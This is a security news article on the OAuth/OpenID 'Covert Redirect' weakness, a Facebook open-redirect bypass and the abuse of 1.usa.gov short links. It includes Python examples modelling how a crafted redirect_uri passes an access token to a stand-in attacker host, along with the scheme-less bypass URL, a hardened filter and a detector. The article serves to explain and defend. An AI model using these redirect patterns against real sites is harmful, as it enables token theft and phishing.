The Hacker News — Cyber Security, Hacking, Technology News

In the wake of Heartbleed, the flaw in the widely used open-source OpenSSL library that put countless websites at risk, another vulnerability has been found affecting two popular login technologies: the authorization protocol OAuth and the authentication protocol OpenID.

Wang Jing, a Chinese mathematics Ph.D. student at Nanyang Technological University in Singapore, found that sites relying on the OAuth and OpenID login protocols are vulnerable to an attack he calls "Covert Redirect".

OAuth and OpenID are widely used open standards. OAuth is designed as a way for users to sign in to or sign up for other services using an existing identity at a site such as Google, Facebook, Microsoft or Twitter, whereas OpenID is a decentralized authentication system that lets users log in at websites across the internet with the same digital identity.

The Covert Redirect vulnerability could affect users who log in through OAuth or OpenID at providers such as Facebook, Google, Yahoo, LinkedIn, Microsoft, VK, Mail.Ru, PayPal, GitHub and many others.

WHAT MAKES IT EVEN MORE DANGEROUS?

The "Covert Redirect" flaw lets an attacker's request masquerade as a genuine login popup from the affected site, allowing the attacker to steal personal data from users and then redirect them to a website of the attacker's choice, which could further compromise the victim.

A victim who clicks a malicious phishing link is shown a real Facebook popup asking them to authorize an app. Instead of hoaxing the user with a fake copy of a legitimate website, Covert Redirect uses the real site's address for the authentication step, which is what makes it convincing.

Once the user logs in, the attacker could obtain personal data, which in the case of Facebook could include the email address, birth date, contacts, work history and so on.

If the token carries greater privileges, the attacker could obtain more sensitive information including the mailbox, friends list and online presence, and quite possibly even operate and control the user's account.

In a blog post yesterday Jing explained that for OAuth 2.0 the attack puts the site user's token at risk: whenever the user authorizes the login, the attacker can use that token to access the user's private information. In the case of OpenID, the attacker obtains the user's information directly, as it is transferred from the provider immediately upon request.

However, this is not the first time the issue has been raised. The root cause is a lack of strict redirect URI whitelisting: the provider accepts a redirect_uri that merely sits on the client application's domain, and an open redirector on that domain can then forward the token (or authorization code) on to the attacker.

RESPONSE FROM INTERNET GIANTS

Facebook uses OAuth and something similar to OpenID. When he reported the vulnerability to Facebook, the company said "they understand the risks associated with OAuth 2.0. However, short of forcing every single application on the platform to use a whitelist, [fixing the vulnerability] isn't something that can be accomplished in the short term."

Facebook isn't the only site affected. Jing reported the vulnerability to several other companies that use OAuth and OpenID, including Google, LinkedIn, Microsoft and Yahoo, to discuss the problem.

Google, which uses OpenID, told Jing that "they are aware of the problem and are tracking it at the moment," whereas LinkedIn said it had acknowledged the problem back in March and "published a blog post on how [they] intend to address [the problem]."

Microsoft replied that, after investigating the matter, it concluded the vulnerability exists in the domain of a third party, different from the one Jing reported, and recommended that he report the issue to that third party instead.

Yahoo had not replied months after he reported it.

“They have little incentive to fix the problem,” Jing wrote regarding the companies, “One concern is the cost and the other is that in their view, the host company is responsible for making the attacks appear more credible; therefore, it is not solely their problem.”

HOW TO FIX COVERT REDIRECT VULNERABILITY

According to Jing, there is no speedy fix. The mitigation is for each third-party application to register, and for the provider to enforce, an exact whitelist of the application's redirect URIs, but "in the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable," Jing wrote.

Jing believes it is unlikely that the flaw will be patched any time soon, since neither the identity providers such as Google, Microsoft and Facebook nor the client companies are taking responsibility for fixing it.

However, exploiting Covert Redirect requires user interaction: the victim has to click a link or visit a malicious website, then click a Facebook login button and agree to authorize the login and the release of information.

So far security experts have not rated this vulnerability as severe as Heartbleed, but it is still a threat.
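To make the mechanism and the fix concrete, here is a small end-to-end model of Covert Redirect in the OAuth 2.0 implicit flow. It is an added example written for this page, not Jing's proof of concept and not any provider's code: the client ID, hostnames, token value and the client's /redirect?next= endpoint are all constructed. It shows the same crafted authorization request succeeding against a provider that only checks the redirect_uri's host, and failing against one that requires an exact match with the registered URI, which is the whitelisting the article refers to.

```python
"""Covert Redirect modelled end to end: an OAuth 2.0 implicit-flow
authorization endpoint, a client site with an open redirector, and the
two redirect_uri policies that decide whether the attack works.
All names (client_id, hosts, token) are constructed for this example."""
from urllib.parse import urlsplit, urlunsplit, parse_qs, urlencode

# Hypothetical provider registration: one client, one registered redirect URI.
REGISTERED = {"client-123": "https://client.example/oauth/callback"}


def redirect_uri_allowed(client_id, redirect_uri, strict):
    """Provider-side check.
    strict=True : exact string match against the registered URI (the fix).
    strict=False: same-host match, the lax rule that makes Covert Redirect work."""
    registered = REGISTERED.get(client_id)
    if registered is None:
        return False
    if strict:
        return redirect_uri == registered
    return urlsplit(redirect_uri).netloc == urlsplit(registered).netloc


def authorize(client_id, redirect_uri, strict, token="tok-SECRET"):
    """Implicit flow: after the user consents, the provider sends the browser
    to redirect_uri with the access token in the URL fragment."""
    if not redirect_uri_allowed(client_id, redirect_uri, strict):
        return None  # provider refuses; the attack stops here
    parts = urlsplit(redirect_uri)
    return urlunsplit(parts._replace(fragment=urlencode({"access_token": token})))


def client_open_redirect(url):
    """The client site's /redirect?next=... endpoint with the classic bug:
    it forwards to any 'next' value. Browsers carry the fragment across a
    3xx redirect whose Location has no fragment, so the token travels along."""
    parts = urlsplit(url)
    nxt = parse_qs(parts.query).get("next", [None])[0]
    if nxt is None:
        return url
    target = urlsplit(nxt)
    # The fragment never reaches the server; the browser re-attaches it.
    return urlunsplit(target._replace(fragment=parts.fragment))


def covert_redirect_attack(strict):
    """The attacker's authorization link names the client's real domain, so the
    consent popup is genuine, but redirect_uri is the client's open redirector
    pointed at the attacker's collector. Returns the URL the browser ends on."""
    crafted = "https://client.example/redirect?next=https://attacker.example/collect"
    landing = authorize("client-123", crafted, strict=strict)
    if landing is None:
        return None
    return client_open_redirect(landing)


if __name__ == "__main__":
    print("lax provider   :", covert_redirect_attack(strict=False))
    print("strict provider:", covert_redirect_attack(strict=True))
```

With the lax policy the browser ends up at the attacker's collector with the access token still in the fragment; with the strict policy the provider never issues the token because the crafted redirect_uri is not the registered one. Fixing the open redirector on the client side also breaks the chain, which is why the article describes both parties as responsible.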

In a separate report, security researcher Dan Melamed discovered an open URL redirection vulnerability in Facebook that allowed him to make a facebook.com link redirect to any website without restriction.

An open URL redirection flaw is typically used to convince a user to click a trusted-looking link that is specially crafted to take them to an arbitrary website; the destination can then serve malware or host a phishing page.

An open URL redirection flaw in the Facebook platform or in a third-party application also puts the user's access token at risk if the redirecting link is supplied as the final destination in an OAuth dialog, which is exactly the Covert Redirect scenario described above.

Facebook's campaign landing page normally redirects the user to the Facebook homepage, but it was enough to manipulate its "url" parameter, here set to a random string:

http://facebook.com/campaign/landing.php?url=asdf

In reality the above URL generates a unique "h" value and passes the url parameter on to Facebook's Linkshim (l.php):

http://www.facebook.com/l.php?u=asdf&h=mAQHgtP_E

Having noted the redirection process, Melamed explored ways to bypass the restrictions on the redirect target and load an arbitrary link.

He discovered that simply removing the http:// prefix from the target destination was enough to redirect a Facebook link elsewhere without any restriction:

http://facebook.com/campaign/landing.php?url=yahoo.com

Facebook's Linkshim (l.php) treated the scheme-less target.com the same as http://target.com, which made the redirection possible.
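The bypass is a parsing mismatch: the filter decides "external or not" by looking for an explicit scheme, while the redirect hop resolves a bare hostname as an http:// URL. The following is an added illustration of that mismatch and of a check that does not have it; it is not Facebook's code (which is not public), and the allowlist, homepage URL and the exact shape of the weak filter are reconstructions for the example.

```python
"""Open redirect via a scheme-less target, in the shape of the
campaign/landing.php -> l.php bug described above, beside a hardened check.
The filter logic is a reconstruction for illustration, not Facebook's code."""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"facebook.com", "www.facebook.com"}  # constructed allowlist
HOME = "http://www.facebook.com/"                      # fallback destination


def weak_redirect_target(url_param):
    """Flawed filter: only values that start with an explicit scheme are
    treated as absolute URLs and host-checked. Anything else is assumed to be
    harmless, yet the redirect hop resolves 'yahoo.com' as http://yahoo.com."""
    if url_param.startswith(("http://", "https://")):
        host = urlsplit(url_param).netloc.lower()
        return url_param if host in ALLOWED_HOSTS else HOME
    # No scheme: modelled after the observed behaviour, a random string such
    # as 'asdf' lands on the homepage while a host-like value escapes.
    if "." in url_param:
        return "http://" + url_param
    return HOME


def safe_redirect_target(url_param):
    """Hardened check: parse first, then require an explicit http(s) scheme,
    no userinfo (https://facebook.com@evil.example), and a hostname that is
    exactly in the allowlist. Scheme-less and protocol-relative (//host)
    values fail the scheme test and fall back to HOME."""
    parts = urlsplit(url_param)
    if parts.scheme not in ("http", "https"):
        return HOME
    host = (parts.hostname or "").lower()
    if parts.username is not None or host not in ALLOWED_HOSTS:
        return HOME
    return url_param


if __name__ == "__main__":
    for value in ("asdf", "http://yahoo.com", "yahoo.com", "//yahoo.com/x",
                  "https://facebook.com@evil.example/", "https://www.facebook.com/help"):
        print(f"{value!r:40} weak={weak_redirect_target(value)!r:24} "
              f"safe={safe_redirect_target(value)!r}")
```

The general lesson is to validate the parsed hostname rather than the raw string: every string-prefix rule has a spelling of the target it did not anticipate (no scheme, a protocol-relative //host, userinfo before an @, or a lookalike subdomain such as facebook.com.evil.example).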

Facebook told Melamed that because the redirection passes through l.php, the platform can filter the destination using its automatic spam and malware analysis.

Even so, although Facebook filters the target URL, it cannot detect every malware or spam campaign, "and by the time a link is banned, an attacker would have already moved on to another link."

Proof of Concept video:

Facebook fixed the vulnerability quickly after Melamed's report and paid out a $1,000 reward under its bug bounty program.

He had previously revealed a critical Facebook vulnerability that allowed account hijacking, as well as two Facebook vulnerabilities related to the social network's Fanpage Invite feature.

In a related case, Symantec has reported an increase in spam messages containing .gov URLs. Cybercriminals are using 1.usa.gov links in their spam campaigns to trick users into thinking the links lead to genuine US government websites.

Spammers created these shortened URLs through a loophole in the URL shortening service provided by bit.ly. USA.gov and bit.ly collaborate to let anyone shorten a .gov or .mil URL into a trustworthy-looking 1.usa.gov URL, so any .gov page that forwards visitors elsewhere can be given a 1.usa.gov short link.

The campaign's click rate has been significant, redirecting more than 16,000 victims over a five-day period to a malicious website designed to look like a CNBC news article pushing several work-from-home scams.

According to Symantec's researchers, the spammers simply leveraged an open-redirect vulnerability on the official website of the state of Vermont (Vermont.gov). A link such as 1.usa.gov/…/Rxpfn9 takes you to labor.vermont.gov/LinkClick.aspx?link=[spam site], which then redirects you to the spam site in question.
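A defender triaging such spam wants to spot the pattern before anyone clicks: a page on a trusted domain whose query string carries a URL for a different host. The following added example (written for this page, not Symantec's or SecureWorks' tooling) does that over already-expanded URLs; it does not resolve 1.usa.gov short links, which needs a network round trip, and its sample URLs are constructed, with spam-site.example standing in for the real destination.

```python
"""Spotting open-redirect abuse in expanded spam URLs: flag a query
parameter that carries a URL for a host other than the page's own host,
and rate a .gov/.mil page forwarding off-site as the highest severity.
Sample URLs are constructed for this example."""
from urllib.parse import urlsplit, parse_qsl, unquote

# Parameter names commonly used to carry a redirect target (constructed list).
REDIRECT_PARAMS = {"link", "url", "u", "next", "redirect", "return",
                   "goto", "dest", "target"}


def external_redirect(url):
    """Return (param_name, target_host) if a redirect-style query parameter
    on `url` holds an absolute, protocol-relative or bare-host URL whose host
    differs from the page host; otherwise None."""
    parts = urlsplit(url)
    page_host = (parts.hostname or "").lower()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in REDIRECT_PARAMS:
            continue
        # parse_qsl decodes once; a second unquote catches double-encoded values.
        value = unquote(value).strip()
        # Normalise http(s)://host, //host and bare host.tld to something urlsplit
        # will read as a netloc; a relative path like /forms/x yields no host.
        candidate = value if "://" in value or value.startswith("//") else "//" + value
        host = (urlsplit(candidate).hostname or "").lower()
        if host and "." in host and host != page_host:
            return name, host
    return None


def triage(urls):
    """Return (url, param, target_host, severity) for every URL that forwards
    off-site. A trusted TLD (.gov/.mil) doing so is the 1.usa.gov case."""
    findings = []
    for u in urls:
        hit = external_redirect(u)
        if hit is None:
            continue
        page_host = (urlsplit(u).hostname or "").lower()
        severity = "high" if page_host.endswith((".gov", ".mil")) else "medium"
        findings.append((u, hit[0], hit[1], severity))
    return findings


SAMPLE_URLS = [  # constructed; spam-site.example stands in for the real destination
    "http://labor.vermont.gov/LinkClick.aspx?link=http://spam-site.example/cnbc-article",
    "http://labor.vermont.gov/LinkClick.aspx?link=%2Fforms%2Fclaim.pdf",
    "https://shop.example.com/login?next=//spam-site.example/offer",
    "https://shop.example.com/login?next=/account",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_URLS):
        print(finding)
```

Only the two off-site forwards are reported; the legitimate LinkClick.aspx link to an internal PDF and the relative /account target are left alone. In a mail pipeline this check would run after the short link is expanded, and the .gov finding is the one worth escalating because the shortener has lent it a credibility that the destination does not deserve.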

Email spam has been the primary method for distributing the short links, wrote Jeff Jarmoc of Dell SecureWorks' Counter Threat Unit.

Most of the victims are in the United States (61%) and Canada (23%), followed by Australia and Great Britain. While abusing URL shorteners or an open-redirect vulnerability is not a new tactic, the fact that spammers can use a .gov service to mint their own links is worrisome. We encourage users to follow best practices and exercise caution when opening links, even when the URL is a .gov one.